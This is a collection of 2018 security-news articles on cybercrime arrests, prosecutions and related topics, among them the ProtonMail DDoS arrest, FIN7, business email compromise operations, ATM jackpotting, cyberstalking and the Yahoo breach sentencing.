ProtonMail highlighted that it is committed to protecting the privacy of its users, but he will not accept that its service could be abused by cybercriminals.

“That’s why we will investigate to the fullest extent possible anyone who attacks ProtonMail or uses our platform for crime. We will also cooperate with law enforcement agencies within the framework of Swiss law,” warned ProtonMail.

“In recent weeks, we have further identified a number of other individuals engaged in attacks against ProtonMail, and we are working with the appropriate authorities to bring them to justice.”

U.K. Teen Involved in ProtonMail DDoS Attack Arrested
8.9.2018 securityweek Crime

ProtonMail has helped law enforcement identify one of the members of the Apophis Squad, a group that has made bomb threats and launched distributed denial-of-service (DDoS) attacks against many organizations.

The U.K. National Crime Agency (NCA) announced this week that a 19-year-old from Hertfordshire was arrested on August 31. The teen, George Duke-Cohan, remains in custody after he pleaded guilty to three counts of making hoax bomb threats.

Duke-Cohan is said to be the leader of Apophis Squad, which has sent bomb threats to thousands of schools in the United Kingdom and the United States. The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

While the charges in the U.K. focus on the hoax bomb threats, Apophis Squad is also known for launching DDoS attacks against encrypted email provider ProtonMail, cybersecurity journalist Brian Krebs, the DEF CON hacking conference, and government agencies in several countries. Its attacks and DDoS-for-hire services have apparently been inspired by the notorious Lizard Squad, whose members were also identified and charged by authorities.

ProtonMail reported in late June that it had been hit by a significant DDoS attack that caused some delays in the delivery of emails. The organization initially said a group linked to Russia had been behind the attack – Apophis Squad’s Twitter account claims the group is from Russia – but Radware, which helped ProtonMail mitigate the attack, later clarified that the attackers were actually based in the U.K.

In a blog post published on Thursday, ProtonMail Founder Andy Yen revealed that his organization helped authorities identify Duke-Cohan and other members of his group after learning that they had all been using ProtonMail.

It turns out that while Duke-Cohan and others claimed law enforcement would never be able to find them, they actually had poor operational security (opsec) practices and they even allowed their own servers to be breached.

Evidence collected from its own systems by ProtonMail and information from Brian Krebs helped identify Duke-Cohan as a member of Apophis Squad in the first week of August. However, British police only arrested him in late August after he threatened to make more bomb threats once school started in September.

The Twitter account used by Apophis Squad has not been active since August 31.

“We believe further charges are pending, along with possible extradition to the US,” Yen said.

ProtonMail aims to protect the privacy of its users, but warned that it does not protect individuals involved in criminal activities.

“That’s why we will investigate to the fullest extent possible anyone who attacks ProtonMail or uses our platform for crime. We will also cooperate with law enforcement agencies within the framework of Swiss law,” Yen said. “In recent weeks, we have further identified a number of other individuals engaged in attacks against ProtonMail, and we are working with the appropriate authorities to bring them to justice.”

The Rise of an Overlooked Crime – Cyberstalking
29.8.2018 securityaffairs Crime

Cyberstalking is one of the most overlooked crimes. This is exactly why it is among the fastest growing crimes in the world. Learn all there is about cyberstalking here.
The internet has been a blessing since its inception. The very concept of globalization has come into existence just because of the internet. The world that was previously unconnected soon became a global village with different cultures and traditions linking together via the information highway.

The internet brought with it plenty of benefits, but accompanying these benefits came some evils that were previously not known of. These evils include hacking, identity theft, online surveillance, and cyberstalking.

We all know the dangers associated with hacking, identity theft, and internet surveillance, thanks to Facebook and other social networking platforms. What we’re probably not aware of is cyberstalking, which is the most disgusting and dangerous of all these threats.

The Dangers of Cyberstalking
Most of us are already aware of what cyber stalking is or have encountered real-world stalking at some point in our lives. Women tend to have had more experiences than men. Stalking in its traditional sense refers to a situation where someone is keeping an eye on you without your will or interest. While this is enough to make someone uncomfortable, stalkers do so to know more about their victim so that they can use the learnt information to blackmail their victims or take advantage from them.

Cyberstalking is not too different, except that it’s more efficient than the traditional one. Because of the internet and all of its connectivity, stalkers do not need to follow you around the neighborhood. If you’re not too careful, they can learn everything there is to know about you, without even leaving their dimly lit basements.

They do this by following you on the internet. Because of social media, it’s not too difficult to follow you around. You probably post most of your daily activities on your social media profile. You check into places, post pictures while you’re there, tell people about the movie you recently watched, and share your current mood and feelings.

Why people get targeted so easily?
All the personal information which is nowadays easily available on the internet can become the source of pleasure for any random cyber stalker. He can learn all there is to know about anyone in just a few clicks.

Most cyber stalkers are skilled hackers as well. They can hack into your social profiles and read your chats, and even post stuff from your profiles which can damage your reputation. Once an account gets compromised finding pictures from chats such as those that may have been shared with an intimate friend is cake walk.

Similarly, these hackers can hack your devices too. This means that any private data saved on your phone can be seen and taken over by the hacker. They can even hack into your webcam and watch you live, without you knowing about it.

Today, modern technology has made it much easier for hackers and other cybercriminals to hide their tracks. With a specialized cyber security tool such as a VPN, anyone can become completely anonymous and invisible online, making it impossible for anyone to detect your presence or activities.

There are many other cybersecurity services that hackers and cyber criminals use for their unfair advantage. These include proxies and remote servers that allow hackers to keep bouncing their traffic on to different servers, thereby keeping them safe from getting detected.

While cyberstalking is an issue for all genders, women are the most affected. When cyber stalkers get their desired info, they use it to blackmail the victim and force them to do special favors. Some demand money, others demand more heinous things. And there’s no end to all this blackmailing. Those who are affected even turn towards suicide just to bring an end to all this creepiness and blackmailing.

According to some recent estimations, 94% of women who use the internet have faced cyberstalking at some point in their life. Moreover, 62% of all cyberstalking victims are young women between the age of 18 and 24.

Over 20,000 cyberstalking cases get reported each year and this number keeps growing every next year. We also know that there may be an equal number of cases which never get reported due to the taboos and stigmas attached with being a victim of cyber stalking. What’s worse is that cyberstalking has been on the rise for many years. Psychologytoday.com says that, cyberstalking is the fastest growing crime and at least 1 million women are cyber-stalked in the US alone. According to a report by WHOA, 60% of all cyberstalking victims are women while 40% are teenage boys and adult males.

The following are a few examples of cyberstalkers who like to prey on the innocents:

Intimate partner stalkers
These are people who refuse to believe that their relationship no longer exists. Intimate partner stalkers are emotionally abusive who want to control their partner despite their breakup. They would continue to keep a constant eye on their separated partner and continue to make them feel extremely uncomfortable, violated, and scared.

Delusional stalkers
These are people who may suffer from major mental illnesses such as schizophrenia, manic-depression, or erotomania. They believe that the victim is in love with him/her and that they are in a relationship even though the victim has no clue about this imaginary relationship. Other delusional stalkers believe that if they pursue the person long enough, the victim would eventually give up and fall in love.

Vengeful stalkers
These people are motivated by vengeance. Vengeful stalkers have a cause to be angry with their victims. Vengeful stalkers are often targeted by members of their university or college faculty/staff. Some of these are psychopaths, while others are delusional and believe that they are the victims even though they’re not. Vengeful stalkers stalk to get even.

The Lack of Awareness…
What’s worse about cyberstalking is that there is virtually no awareness on it. Those who are affected by this issue do not know how to deal with it. This is because most victims prefer to stay quiet to save their name and their reputation. Others can’t even find the right platforms to raise their voice and find the right kind of help.

However, there are businesses and organizations that are standing up against cyberstalking and are using their resources and their knowledge to help the victims. Cyberstalking is a menace but it can be dealt with if proper precautions are followed. You can follow some important precautions mentioned here and stay safe from cyberstalking.

Darknet Market Spokesman Gets Nearly 4 Years in Prison
2.8.2018 securityweek Crime

ATLANTA (AP) — A man who promoted an international criminal online marketplace and assisted people using it for illicit transactions was sentenced Tuesday in Atlanta to serve nearly four years in federal prison.

Ronald L. Wheeler III of Streamwood, Illinois, worked for about two years as a public relations specialist for AlphaBay, which authorities have said was the world's leading "darknet" marketplace when an international law enforcement effort shut it down in July 2017.

Wheeler pleaded guilty in March to a charge of conspiracy to commit access device fraud. Prosecutors said he worked with others to steal personal information — including passwords, email addresses and bank account numbers — to obtain money, goods and services.

U.S. District Judge Leigh May sentenced Wheeler, 25, to spend three years and 10 months in prison, followed by three years of supervised release. As part of a plea deal reached with prosecutors, Wheeler also agreed to forfeit $27,562 in cash found in his home and 13.97 bitcoins, which are currently worth a total of more than $100,000.

Wheeler apologized to the judge and told her he has worked hard since he was caught to get himself on the right path — getting a legitimate job, paying taxes and kicking a drug addiction.

"As I move forward, I hope to be able to do right by this country and the world," he said.

May said Wheeler's crime was extremely serious, but she imposed the relatively light sentence agreed to by the two sides in part because of the effort he'd made.

"You're doing what you need to do to show me you've learned from this," she said.

Known online as Trappy and Trappy_Pandora, Wheeler began working for AlphaBay in May 2015. His duties included moderating the AlphaBay forum on Reddit and posting information about AlphaBay in other Reddit forums, mediating sales disputes among the marketplace's users, providing nontechnical assistance to users and promoting AlphaBay online, prosecutors have said.

Wheeler's lawyer, Phillip Turner, described his client as a "very misguided young man who came from a situation where he lacked self-esteem and got on the wrong path." Having a title bestowed upon him by AlphaBay made him feel important and gave him a sense of belonging, Turner said in court.

Prosecutor Samir Kaushal told the judge Wheeler was completely aware he was involved in illegal activity and encouraged lawlessness in others. Given the scope of the illegal activity enabled by AlphaBay — including the sale of personal financial information and dangerous drugs — Wheeler could have been charged with much more serious crimes that would have carried a much heftier sentence.

"This is a very good outcome for him," Kaushal said.

The only reason prosecutors recommended a lower sentence is because when he was caught, he immediately admitted his guilt and began cooperating with the government, Kaushal said.

Wheeler was paid a salary in bitcoin, a digital currency, by Alexandre Cazes, the 25-year-old Canadian owner of AlphaBay who was known online as Alpha02 and Admin, according to a court filing.

AlphaBay used Tor, a network of thousands of computers run by volunteers, to hide its tracks. With Tor, traffic gets relayed through multiple computers, with identifying information stripped at each stop so no single computer knows the full chain.

The court filing says Wheeler's work with AlphaBay ended July 3, 2017. Two days later, Cazes was arrested in Thailand with DEA and FBI assistance, resulting in AlphaBay going offline. Cazes died in Thai police custody on July 12, 2017. The country's narcotics police chief told reporters at the time that Cazes hanged himself in jail just before a scheduled court hearing.

The police agency Europol estimates AlphaBay had done $1 billion in business since its 2014 creation. Cazes had amassed a $23 million fortune as the site's creator and administrator, according to court records.

Three Ukrainians Arrested for Hacking Over 100 US Companies
2.8.2018 securityweek Crime

Three Ukrainians have been arrested for hacking more than 100 US companies and stealing millions of customer records, the Department of Justice announced Wednesday.

Dmytro Fedorov, 44, Fedir Hladyr, 33, and Andrii Kopakov, 30, were members of a "sophisticated international cybercrime group" called "FIN7," the department said in a statement.

"Since at least 2015, FIN7 members engaged in a highly sophisticated malware campaign targeting more than 100 US companies, predominantly in the restaurant, gaming, and hospitality industries," it said.

"FIN7 hacked into thousands of computer systems and stole millions of customer credit and debit card numbers, which the group used or sold for profit," it said.

The Justice Department said members of the "prolific hacking group" also targeted computer networks in Britain, Australia, and France.

FBI special agent Jay Tabb told a press conference in Seattle, Washington, where the arrests were announced, that the hacking was not state-sponsored.

"No linkage at all to any state-sponsored activity," Tabb said. "This is just old-fashioned organized crime."

Fedorov, a "high-level hacker and manager," was arrested in Bielsko-Biala, Poland, in January and is being detained pending extradition to the United States, the Department of Justice said.

Hladyr, FIN7's systems administrator, was arrested in Dresden, Germany, in January, it said, and is being held in Seattle, Washington, pending a trial scheduled to open on October 22.

Kolpakov, described as a "supervisor of a group of hackers," was arrested in Lepe, Spain, in late June and is being detained there pending a US extradition request, the department said.

- Chipotle, Arby's targeted -

"Cyber criminals who believe that they can hide in faraway countries and operate from behind keyboards without getting caught are just plain wrong," said Annette Hayes, US Attorney for the Western District of Washington.

The charges against the three were contained in federal indictments unsealed on Wednesday.

They were charged with 26 counts of conspiracy, wire fraud, computer hacking, access device fraud, and aggravated identity theft.

The Justice Department said that FIN7 also known as the "Carbanak Group" and the "Navigator Group," breached computer networks of companies in 47 US states and Washington DC.

They allegedly stole "more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations."

Among the companies which have publicly disclosed hacks by FIN7 are Chipotle Mexican Grill, Chili's, Arby's, Red Robin and Jason's Deli, the Justice Department said.

Many of the businesses were targeted through phishing schemes involving email.

"FIN7 carefully crafted email messages that would appear legitimate to a business' employee, and accompanied emails with telephone calls intended to further legitimize the email," it said.

Once an attached file was opened, it would trigger malware to steal payment card data which was sold on online underground marketplaces.

Two Arrested for Hacking 700,000 Accounts
2.7.2018 securityweek  Crime

Russian law enforcement this week said two individuals were arrested for compromising accounts of loyalty program members from popular websites.

The unnamed cybercriminals allegedly compromised around 700,000 accounts from companies such as PayPal, Ulmart, Biglion, KupiKupon, Groupon, and others. They are also said to have put 2,000 of these accounts up for sale for $5 each.

“The detainees admitted on the spot that they had earned at least 500,000 rubles. However, the real amount of damage remains to be determined,” Group-IB, which aided with the investigation, says.

The hackers’ activity stirred interest in November 2015, after the website of a large online store fell to a large-scale cyber-attack in which the personal accounts of the store’s loyalty program members were compromised. Miscreants compromised around 120,000 accounts within a month.

The investigators discovered that the attackers “had collected compromised account information from various Internet services on hacker forums and used special programs to automatically guess passwords of accounts on the website of the online store.”

The miscreants relied on people’s habit of reusing the same login/password on multiple websites. If the logins and passwords were used on the targeted websites, the hackers would access those personal accounts.

The cybercriminals would check the accumulated bonuses on each account and would sell them on hacker forums at $5 per account or 20-30% of the nominal balance of the accounts. The buyers could then abuse the accounts to pay for products with the bonuses.

The hackers, Group-IB says, weren’t only selling compromised accounts, but also offered services for hijacking accounts: they would change the phone number and e-mail on the accounts of the online store. Such services were offered at a price of 10% of the bonus balance on the account.

To hide their tracks, the attackers used anonymizers, launched the attacks from different IP addresses, and also changed the digital fingerprint of the browser (User-Agent). Overall, they sent authorization requests from more than 35,000 unique IP addresses.

Large retailers started checking all orders with payment bonuses in early 2016, which determined the hackers to target lesser-known online stores.

“In addition, the hackers began to work on tips—information about new online stores with bonus programs and coupon services where it was possible to access personal accounts, for which the attackers promised to pay up to 50% of the amount received from the further sale of the compromised accounts,” Group-IB reports.

The leader in these attacks was a resident of Ryazan Region, born in 1998. His partner, born in 1997, who provided technical support for their joint online store, resided in Astrakhan Region.

During a search, investigators seized evidence of the group’s unlawful activities, along with narcotics. The suspects have confessed to the crimes but the investigation is still ongoing.

Eight Arrested for Roles in Email Fraud Schemes
26.6.2018 securityweek  Crime

Eight individuals were arrested for their roles in a widespread, Africa-based business email compromise (BEC) conspiracy, the United States Department of Justice announced on Monday.

Following operation WireWire earlier this month, the new international effort named "Operation Keyboard Warrior", resulted in five individuals being arrested in the United States, along with three others in Ghana. Four more were indicted for their roles in the CEO schemes, but remain at large.

BEC is a type of fraud targeting decision-making positions within organizations via email, phone, or fax, to hijack wire transfers or trick them to authorize payments for fake invoices.

Tens of thousands fell victims to BEC schemes, while losses amount to billions. Victims include accounts payable personnel at Fortune 500 companies, global maritime shipping companies and their customers, and more.

As part of Operation Keyboard Warrior, DoJ coordinated with international law enforcement to disrupt online frauds perpetrated from Africa. The operation, which has been ongoing since at least 2012, allegedly defrauded U.S. companies and citizens of around $15 million, the Justice Department says.

The individuals arrested in the U.S. are Javier Luis Ramos Alonso, 28, a Mexican citizen residing in Seaside, California; James Dean, 65, of Plainfield, Indiana; Dana Brady, 61, of Auburn, Washington; Rashid Abdulai, 24, a Ghanaian citizen residing in the Bronx, New York, and Olufolajimi Abegunde, 31, a Nigerian citizen residing in Atlanta, Georgia.

Maxwell Atugba Abayeta aka Maxwell Peter, 26, and Babatunde Martins, 62, of Ghana and Benard Emurhowhoariogho Okorhi, 39, a Nigerian citizen who resides in Ghana, were arrested overseas and await their extradition. Sumaila Hardi Wumpini, 29; Dennis Miah, 34; Ayodeji Olumide Ojo, 35, and Victor Daniel Fortune Okorhi, 35, who were also charged in the indictment, remain at large.

The defendants are charged with conspiracy to commit wire fraud, wire fraud, conspiracy to commit money laundering, conspiracy to commit computer fraud, and aggravated identity fraud.

According to the indictment, the Africa-based coconspirators committed, or caused to be committed, intrusions into the servers and email systems of a Memphis-based real estate company in June and July 2016.

The defendants used spoofed email addresses and Virtual Private Networks to identify large financial transactions, engage into fraudulent email correspondence with relevant business parties, and redirect closing funds, through a network of U.S.-based money mules, to Africa. The scheme defrauded companies and individuals in Memphis of hundreds of thousands of dollars.

According to the indictment, some of the Africa-based defendants also engaged in various romance scams, fraudulent-check scams, gold-buying scams, advance-fee scams, and credit card scams. All the proceeds of these criminal activities were shipped and/or transferred from the United States to locations in Ghana, Nigeria, and South Africa.

Some of the defendants are also said to have been concealing their conduct by, among other means, “stealing or fraudulently obtaining personal identification information (PII) and using that information to create fake online profiles and personas,” the DoJ announcement reads.

“The defendants allegedly unleashed a barrage of international fraud schemes that targeted U.S. businesses and individuals, robbing them to the tune of approximately $15 million,” Acting Assistant Attorney General John P. Cronan of the Justice Department’s Criminal Division said.

Massachusetts Man Pleads Guilty to ATM Hacking
21.6.2018 securityweek  Crime

A Massachusetts man pleaded guilty to his role in an ATM “jackpotting” operation, the United States Department of Justice announced this week.

ATM jackpotting is a type of attack where individuals who have physical access to an automated teller machine connect to it and then use malware or specialized electronic equipment (or both) to gain control of the system’s operations.

Long observed in Europe and Asia, ATM jackpotting only arrived in the United States in late 2017. In January 2018, the US Secret Service issued a warning to alert law enforcement and financial institutions on jackpotting attacks. Incidents were observed in Connecticut and elsewhere.

In early February, the DoJ announced that Alberto Fajin-Diaz, 31, a citizen of Spain, and Argenys Rodriguez, 21, of Springfield, Massachusetts, were charged over ATM jackpotting after being arrested on January 27 after being found near an ATM compromised with jackpotting malware to dispense $20 bills.

On Monday, John H. Durham, United States Attorney for the District of Connecticut, announced that Rodriguez pleaded guilty to his role in the ATM jackpotting scheme.

After being alerted by Citizens Bank investigators of a possible jackpotting attack on an ATM in Cromwell, the police encountered Rodriguez and Fajin-Diaz in the vicinity of an “ATM that had been compromised with malware and was in the process of dispensing $20 bills,” the DoJ says.

In the duo’s vehicle, the police found tools and electronic devices that could be used to compromise ATMs to dispense cash. The two men also had around $5,600 in cash, yet the investigation revealed that over $63,000 had been taken from the ATM on that date.

The investigators later discovered that, on January 22, 2018, Rodriguez, Fajin-Diaz and others illegally obtained $63,820 from a Citizens Bank ATM in Rhode Island.

Rodriguez is scheduled to be sentenced on September 26, 2018. He faces a maximum term of imprisonment of 30 years. Fajin-Diaz pleaded guilty to his role in the ARM jackpotting attacks on June 12, 2018, and awaits sentencing.

Google Removes Inline Installation of Chrome Extensions
13.6.2018 securityweek Crime

Google this week detailed plans to completely remove the inline installation of Chrome extensions from its web browser by the end of the year.

Introduced in 2011, inline installation was meant to make it easier for users to add extensions to the browser by installing them directly from the developer’s website instead of having to go to the Chrome Web Store.

Starting this Tuesday, June 12, inline installation is no longer available for newly published extensions. This fall, however, the change will also affect existing extensions, Google says.

“Extensions first published on June 12, 2018 or later that attempt to call the chrome.webstore.install() function will automatically redirect the user to the Chrome Web Store in a new tab to complete the installation,” James Wagner, Extensions Platform Product Manager at Google, explains.

The next stage will enter into effect on September 12, 2018. Starting that day, inline installation will be disabled for existing extensions, meaning that all users will be automatically redirected to the Chrome Web Store in order to complete installations.

The final nail in the coffin, however, will be put in early December 2018, when Chrome 71 arrives. That browser release, the search company says, will be stripped of the inline install API method.

“Later this summer, inline installation will be retired on all platforms. Going forward, users will only be able to install extensions from within the Chrome Web Store, where they can view all information about an extension’s functionality prior to installing,” Wagner revealed.

According to Google, the removal of inline installation of extensions would add more transparency for Chrome users. Many of these users, the company claims, complain about unwanted extensions on their browser, with most of the complaints referring to “confusing or deceptive uses of inline installation on websites.”

To eliminate the issue, the search provider says, users will be redirected to the Chrome Web Store instead, where detailed information on what’s being installed is available. Thus, users will “fully understand how their browsing experience will be impacted.”

Developers with extensions that use inline installation need to update the install buttons on their website to link to the extension’s Chrome Web Store page prior to the stable release of Chrome 71.

Several years ago, Google disabled the inline installations for Chrome extensions for developers who used deceptive tactics to trick users into installing their products.

Over the past several years, millions of Chrome users were impacted by malicious extensions published to the Chrome Web Store. Some of these applications could lead to the injection and execution of arbitrary JavaScript code, while others were hijacked to display potentially malicious ads and steal user credentials.

74 Arrested in International Operation Targeting BEC Scams
12.6.2018 securityweek Crime

A total of 74 individuals have been arrested as part of an international law enforcement operation targeting business email compromise (BEC) scams, U.S. authorities announced on Monday.

Forty-two people have been arrested in the United States, 29 in Nigeria, and three in Canada, Mauritius, and Poland. The operation, dubbed “Wire Wire” and conducted over a period of six months, also resulted in the seizure of nearly $2.4 million and the disruption and recovery of roughly $14 million in fraudulent wire transfers, according to the Department of Justice and the FBI.

Some of the suspects are believed to have been involved in schemes targeting businesses of all sizes, while others targeted individual victims.

The Justice Department said 23 individuals were charged in the Southern District of Florida with laundering at least $10 million obtained from BEC scams. The list of suspects also includes two Nigerian nationals living in Dallas, Texas, who tricked a real estate closing attorney into wiring $246,000 to accounts they controlled.

A separate indictment targets three individuals, two of which were extradited to the United States from the United Kingdom and Mauritius.

BEC scams, which authorities also call cyber-enabled financial fraud, often target employees with access to company finances and trick them into making wire transfers to bank accounts controlled by the criminals. The FBI has received reports of losses totaling more than $3.7 billion since the agency’s Internet Crime Complaint Center (IC3) has been keeping track of BEC scams.

“The federal law enforcement agencies that executed on this takedown deserve our gratitude” said Christy Wyatt, CEO of Dtex Systems, a security provider that helps organizations defend their most trusted insiders. “Removing 42 criminals off of our cyber streets will hopefully make things safer, serve as warning to others and provide us with details that will help us to be more secure moving forward. The operation is also a reminder that most major cybercrimes involve employee error and under-utilization of technology and education resources that can be used to defend our most trusted insiders.”

Marcus Hutchins, WannaCry-killer, hit with four new charges by the FBI
8.6.2018 thehackernews  Crime

Marcus Hutchins, the British malware analyst who helped stop global Wannacry menace, is now facing four new charges related to malware he allegedly created and promoted it online to steal financial information.
Hutchins, the 24-year-old better known as MalwareTech, was arrested by the FBI last year as he was headed home to England from the DefCon conference in Las Vegas for his alleged role in creating and distributing Kronos between 2014 and 2015.
Kronos is a Banking Trojan designed to steal banking credentials and personal information from victims' computers, which was sold for $7,000 on Russian online forums, and the FBI accused Hutchins of writing and promoting it online, including via YouTube.

Hutchins pleaded not guilty at a court hearing in August 2017 in Milwaukee and release on $30,000 bail.
However, earlier this week, a revised superseding indictment [PDF] was filed with the Wisconsin Eastern District Court, under which Hutchins faces four new charges along with the six prior counts filed against him by the FBI a month before his arrest.
Marcus Accused of Creating and Selling Another Malware
According to the new indictment, Hutchins created a second piece of malware, known as "UPAS Kit," and also lied to the Federal Bureau of Investigations (FBI) when he was arrested and questioned last year in Las Vegas.
As described by prosecutors, UPAS Kit is Spybot virus that "allowed for the unauthorized exfiltration of information from protected computers" and "used a form grabber and web injects to intercept and collect personal information," including credit card details.
UPAS Kit advertised to "install silently and not alert antivirus engines," for prices ranged above $1,000 back in 2012.
According to the indictment, Hutchins created UPAS Kit in 2012, when he was just 18, and sold it online to another unnamed co-defendant identified as "VinnyK" (aka Aurora123), who was also involved in promoting Kronos.

VinnyK then sold UPAS Kit to another person in Wisconsin in 2012, who allegedly used the malware to attack computers in the United States.
Two other charges relate to Hutchins "aiding and abetting" the distribution of invasive code in an attempt to damage "10 or more protected computers," and helping others to hack computers for financial gain.
Marcus Appealed to his Followers for Donations to Cover Legal Costs
As the news on the revised indictment broke, Hutchins, who has repeatedly denied any illegal activity, called the charges "bullshit" and appealed to his Twitter followers for donations to cover legal costs.
"Spend months and $100k+ fighting this case, then they go and reset the clock by adding even more bullshit charges like 'lying to the FBI,'" Hutchins wrote on his Twitter, calling for donations by adding a quote from Starcraft video game: "We require more minerals."
Hutchins' lawyer Brian Klein called the charges "meritless" and said he expects his client to be cleared of all charges.
"[We] are disappointed the govt has filed this superseding indictment, which is meritless," Klein tweeted. "It only serves to highlight the prosecution's serious flaws. We expect [Hutchins] to be vindicated and then he can return to keeping us all safe from malicious software."
Hutchins, who is living in Los Angeles on bail, is unable to leave the United States since last year due to his pending criminal charges.
Hutchins stormed to fame and hailed as a hero earlier last year when he accidentally stopped a global epidemic of the WannaCry ransomware attack that crippled computers all across the world.

Teen Arrested for Hacking Minnesota Government Systems
7.6.2018 securityweek Crime

The United States Department of Justice this week announced the arrest of an individual charged with the hacking of servers owned by the State of Minnesota.

The suspect, Cameron Thomas Crowley, 19, who uses the online handle of Vigilance, made an initial appearance in court on Tuesday, before United States Magistrate Judge Becky R. Thorson in Saint Paul, Minnesota. He remains in federal custody pending his detention hearing.

In addition to announcing Crowley’s arrest, the Department of Justice revealed a five-count indictment that charges the individual with intentional access to a protected computer, intentional damage to a protected computer, and aggravated identity theft.

The indictment alleges that, between May 28, 2017 and June 17, 2017, Crowley intentionally accessed protected servers owned by the State of Minnesota and other entities, without authorization.

In June last year, Vigilance announced on Twitter the hacking of databases belonging to the Minnesota state government and the theft of over a thousand email addresses and corresponding passwords, all of which were dumped online.

The hacker said at the time the action was the result of a jury finding Jeronimo Yanez, a police officer from St. Anthony, Minnesota, not guilty of manslaughter after he shot and killed African-American Philando Castile during a seemingly routine traffic stop in the summer of 2016.

Castile, 32, was shot seven times when he tried to reach for his ID, after he told Yanez he had a gun and a license to carry it. Castile was in the car with his girlfriend and their 4-year-old daughter.

Crowley is also charged with transmitting programs, code, and commands to the compromised servers, causing damage that led to a loss to the State of Minnesota of more than $5,000.

Thus, the alleged hacker is charged with three counts of intentional access to a protected computer and one count of intentional damage to a protected computer. Additionally, the indictment charges Crowley with one count of aggravated identity theft.

The investigation into this case is conducted by the Federal Bureau of Investigation and the Minnesota Bureau of Criminal Apprehension.

Yahoo Hacker linked to Russian Intelligence Gets 5 Years in U.S. Prison
7.6.2018 thehackernews  Crime

A 23-year-old Canadian man, who pleaded guilty last year for his role in helping Russian government spies hack into email accounts of Yahoo users and other services, has been sentenced to five years in prison.
Karim Baratov (a.k.a Karim Taloverov, a.k.a Karim Akehmet Tokbergenov), a Kazakhstan-born Canadian citizen, was also ordered on Tuesday by United States Judge Vince Chhabria to pay a fine of $250,000.
Baratov had previously admitted his role in the 2014 Yahoo data breach that compromised about 500 million Yahoo user accounts. His role was to "hack webmail accounts of individuals of interest to the FSB," Russia's spy agency.
In November, Baratov pleaded guilty to a total of nine counts, including one count of conspiring to violate the Computer Fraud and Abuse Act, and eight counts of aggravated identity theft.
According to the US Justice Department, Baratov and his co-defendant hacker Alexsey Belan worked for two agents—Dmitry Dokuchaev and Igor Sushchin—from the FSB (Federal Security Service) to compromise the accounts.
The Justice Department announced charges for all of the four people in March last year, which resulted in the arrest of Baratov in Toronto at his Ancaster home and then his extradition to the United States.
However, Belan—who is already on the FBI's Most Wanted Hackers list—and both FSB officers currently reside in Russia, due to which they are unlikely to face the consequences for their involvement.
Baratov ran an illegal no-questions-asked hacking service from 2010 until his arrest in March 2017, wherein he charged customers around $100 to obtain another person's webmail password by tricking them to enter their credentials into a fake password reset page.
According to the court documents, Baratov managed to crack more than 11,000 email accounts in both Russia as well as the United States before the Toronto Police Department caught him.
As part of his plea, Baratov admitted to hacking thousands of webmail accounts of individuals for seven years and send those accounts' passwords to Russian spy Dokuchaev in exchange for money.
The targeted attack allowed the four to gain direct access to Yahoo's internal networks, and once in, co-defendant hacker Belan started poking around the network.
According to the FBI, Belan discovered two key assets:
Yahoo's User Database (UDB) – a database containing personal information about all Yahoo users.
The Account Management Tool – an administrative tool used to make alterations to the targeted accounts, including their passwords.
Belan then used the file transfer protocol (FTP) to download the Yahoo's UDB, which included password recovery emails and cryptographic values unique to each Yahoo account, eventually enabling Belan and Baratov to access specific accounts of interest to the Russian spies.
According to Baratov's lawyers, at the time of the crime, Baratov had no idea he was working with Russian FSB agents.

Accused Yahoo Hacker Gets Five Years in Prison, Fine
30.5.2018 securityweek Crime

A man accused of taking part in devastating cyberattacks on Yahoo for Russian intelligence agents was sentenced Tuesday to five years in prison in a plea bargain with prosecutors.

The deal struck by 23-year-old Karim Baratov, who immigrated to Canada from Kazakhstan, also resulted in a fine that "encompasses all his remaining assets," the US Justice Department said in a statement.

Baratov has been in American custody since being extradited from Canada last year on a US warrant for hacking, commercial espionage and related crimes.

US authorities allege Russian intelligence agents hired Baratov and another hacker to carry out attacks on Yahoo from 2014 to 2016.

The data breach compromised 500 million Yahoo accounts and is one of the largest cyberattacks in history.

"The sentence imposed reflects the seriousness of hacking for hire," said prosecutor Alex Tse.

"Hackers such as Baratov ply their trade without regard for the criminal objectives of the people who hire and pay them."

Targets included Russian and US government officials, cyber security, diplomatic and military personnel, journalists, companies and financial firms.

"It's difficult to overstate the unprecedented nature of this conspiracy, in which members of a foreign intelligence service directed and empowered criminal hackers to conduct a massive cyber-attack against 500 million victim user accounts," said John Bennett, FBI special agent in charge for the San Francisco field office.

Russian Police Arrest Man Involved in Android Banking Trojan Scheme
25.5.2018 securityweek Crime 

Law enforcement authorities in Russia have arrested an unnamed 32-year-old man who is believed to be part of a cybercrime ring that made up to $8,000 per day using Android banking Trojans.

According to Russia-based cybersecurity firm Group-IB, the suspect is an unemployed Russian national who had previously been convicted for arms trafficking. He was arrested earlier this month and reportedly already confessed.

The cybercrime group used a malicious Android app named “Banks at your fingertips” to trick the customers of Russian banks into handing over their financial information. The banking Trojan was disguised as a tool that claimed to allow users to access all their bank accounts from one Android app. It offered users the possibility to view balances, transfer money between payment cards, and pay for online services.

The malicious app, distributed via spam emails since 2016, instructed users to enter their card details, which were then sent to a server controlled by the attackers. The cybercrooks transferred between $1,500 and $8,000 per day from victims’ bank accounts, $200-$500 at a time. The criminal proceeds were laundered using cryptocurrencies.

The malware also helped the attackers intercept the SMS confirmation codes sent by banks, at the same time blocking all text messages confirming transactions in an effort to avoid raising suspicion.

While Russia has occasionally collaborated with Western law enforcement agencies to bring down global cybercrime operations, it has often turned a blind eye to the activities of hackers who have mainly targeted the United States.

Four Russian nationals are currently on the FBI’s Cyber Most Wanted list, including the alleged administrator of a massive cybercrime scheme involving the Zeus Trojan, and three people believed to have been involved in attacks on Yahoo that resulted in roughly 500 million accounts getting compromised.

The Russian government has defended some of the alleged hackers arrested by the United States – in one case Moscow accused Washington of abducting the son of a lawmaker.

On the other hand, the government has been known to crack down on cybercrime rings that target Russian citizens. Police have arrested 50 hackers believed to have used the Lurk Trojan, the creator of the Svpeng Android malware, and nine people who allegedly stole $17 million from bank accounts.

Judges convict crook of operating Scan4You Counter Antivirus Service
20.5.2018 securityaffairs Crime

Crook faces up to 35 years in prison for operating the popular Scan4You counter anti-virus (CAV) website that helped malware authors to test the evasion capabilities of their codes.
Scan4You is a familiar service for malware developers that used it as a counter anti-virus (CAV).

Scan4You allowed vxers to check their malware against as many as 40 antivirus solutions.


